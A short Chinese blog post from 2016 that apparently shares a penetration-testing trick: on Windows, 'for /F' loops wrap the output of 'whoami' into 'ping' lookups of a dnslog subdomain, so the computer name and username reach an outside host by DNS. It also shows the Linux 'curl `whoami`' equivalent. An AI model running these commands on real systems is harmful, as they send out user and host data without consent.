dnslog注入

  

使用Powershell反弹Meterpreter Shell

 

cloudeye在windows下的应用

今天突发奇想的一个姿势,算不上什么技巧,分享一下吧。 
看到有人问过。http://zone.wooyun.org/content/27440 

其实很羡慕linxu的curl `whoami`.xxxxxx.dnslog.info
这样去获取数据什么的。 

windows下面其实用命令也可以实现,不过还是有很多问题。 

比如win下获取当前用户: 
whoami 

l3m0n3115\l3m0n 
获取计算机名: 
for /F "delims=\" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.info
获取用户名: 
for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.info

dns.png

获取文件内容什么的也可以这样获取,比如再for通过循环一下,但是编码问题是硬伤。 
其实核心的还是利用了for /f 

posted @ 2016-12-21 12:16  Hookjoy  阅读(466)  评论(0编辑  收藏  举报